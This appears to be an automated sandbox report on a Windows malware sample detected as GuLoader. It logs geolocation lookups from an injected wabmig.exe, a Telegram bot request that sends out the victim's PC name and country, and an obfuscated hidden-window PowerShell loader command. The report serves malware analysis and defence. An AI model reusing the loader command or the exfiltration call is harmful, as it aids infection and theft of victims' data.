                                                            2024-09-25 14:01:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.849715188.114.97.34438168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-25 14:01:30 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-09-25 14:01:30 UTC686INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:30 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24949
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6RYGPGBYdj%2F7lEE9yAllCgMmn3dR%2FWM0CM2pWiGLptbwU04Lp4CGNEdRscf%2FFEnR4F7m5eqa8kwHzG6HAyK8V1i%2BYKwCKLvVqpCdoqTkvtYHlfryWQ%2FdDMcrA%2Bz%2B4Mk4%2F4RQzb1K"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8bf01f188ce9-EWR
                                                            2024-09-25 14:01:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.849717188.114.97.34438168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-25 14:01:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:32 UTC710INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:32 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24951
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2F0Y87MBeglJkmfDqpFFTlWqd4or77Z7Ff3hjh%2F0%2FddrTRSad9Hyd0VtkscFxFBLFoQmjKkKwl7czM9C%2FB8ahKvFevPU5uYaIhIdPSwnobfLZ43pmSlO1AP10aYkT2L%2B6MHBTQke"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8bf82cf40fa1-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-09-25 14:01:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.849719188.114.97.34438168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-25 14:01:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:33 UTC674INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:33 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24952
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ftc2d1mpIlb4%2B2yKNwkveRaD3AIFObiMMw5DLKU30ePDlcbngTZkIkqiOfh601sL8Hb2olXbI0VRNz22xIBpxcD54wcZX9Y5K8aW9hV6yrGyrc83parl6Pmz%2FZvgMLry0L8CKuTI"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8c006fff19e7-EWR
                                                            2024-09-25 14:01:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.849721188.114.97.34438168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-25 14:01:34 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-09-25 14:01:34 UTC684INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:34 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24953
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nt0Stbp647a9uOMr5a8Rt0f6Dll%2FYAYK2ZTSDhWIxqQIW4GOOKy9fSHwjGy5I4xIrXuCowbBkHBjeCbdD0UCZFXVzO%2FaFAOKLpjAJtulDZKR24%2FbPGl6gpQ%2Bs%2F8%2Fm%2Bl9AWaNpxBv"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8c08794741e6-EWR
                                                            2024-09-25 14:01:34 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.849723188.114.97.34438168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-25 14:01:36 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:36 UTC674INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:36 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24955
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IU4zTsace5To79PjzTSGATUJ1ESHEUamlhDB9rT8G71AGdj15ste1bVxIxy2R6OuonY93L8Fxer2CuYKOE0gm8Pj1aWa8cAp%2F93miuYMg%2BVRVhpMLPIhtTgUf1JcneYemb3TT9mS"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8c10be4d42af-EWR
                                                            2024-09-25 14:01:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.849725188.114.97.34438168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-25 14:01:37 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:37 UTC690INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:37 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24956
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQNJTu803U9M6hK7MWnpondUN%2BD7Uq1hQrgNSNzHIDmtRsTXKYiZXlfRph7q%2BxKuJDg2fzqddN%2FNfe%2BvwAZB%2BwaW8l75ObgPNfHVJqlo6h0G2MdIpAHTNxX%2FrO1fwX2S%2F%2Fxj%2Ffc%2B"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8c1a49c80c80-EWR
                                                            2024-09-25 14:01:37 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.849727188.114.97.34438168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-25 14:01:38 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-09-25 14:01:39 UTC682INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:39 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24957
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eymueM0mbmMO9igrj3UtcWXmtle%2BZBtDtoIymyPb1YTi3QQkl1QSJE1IN66HVmUK5sij%2BrBdsdf0mxvfAELkt6eI%2FYL7PFXNuuK%2BdGkxC0%2BNgpsGi%2F4FbWfWJhnhQruOU2rqHTTL"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8c22af1f8c1b-EWR
                                                            2024-09-25 14:01:39 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.849729188.114.97.34438168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-25 14:01:40 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:40 UTC674INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:40 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24959
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q7R1sQlIRtrqi52t6jYg83uRmyeiKkL9e0I3V1bT3fVHPAMnD%2BsbcmGylqoIU5c6izmgvAguwr94EeUuRasKm2zdSXQlNOOhgIctg8dIrJL4%2FQvXWEMt4Zl80Hi48eCApeONnJBg"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8c2bdaff424b-EWR
                                                            2024-09-25 14:01:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.849730149.154.167.2204438168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-25 14:01:41 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20and%20Time:%2025/09/2024%20/%2022:55:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20093954%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                            Host: api.telegram.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:41 UTC344INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 25 Sep 2024 14:01:41 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 55
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2024-09-25 14:01:41 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:10:00:07
                                                            Start date:25/09/2024
                                                            Path:C:\Users\user\Desktop\file.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                            Imagebase:0x400000
                                                            File size:750'104 bytes
                                                            MD5 hash:7FBB332B55F872E61C8307E0B5242287
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:10:00:08
                                                            Start date:25/09/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)"
                                                            Imagebase:0xb0000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2217265751.000000000B997000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:10:00:08
                                                            Start date:25/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:10:01:10
                                                            Start date:25/09/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
                                                            Imagebase:0xd50000
                                                            File size:66'048 bytes
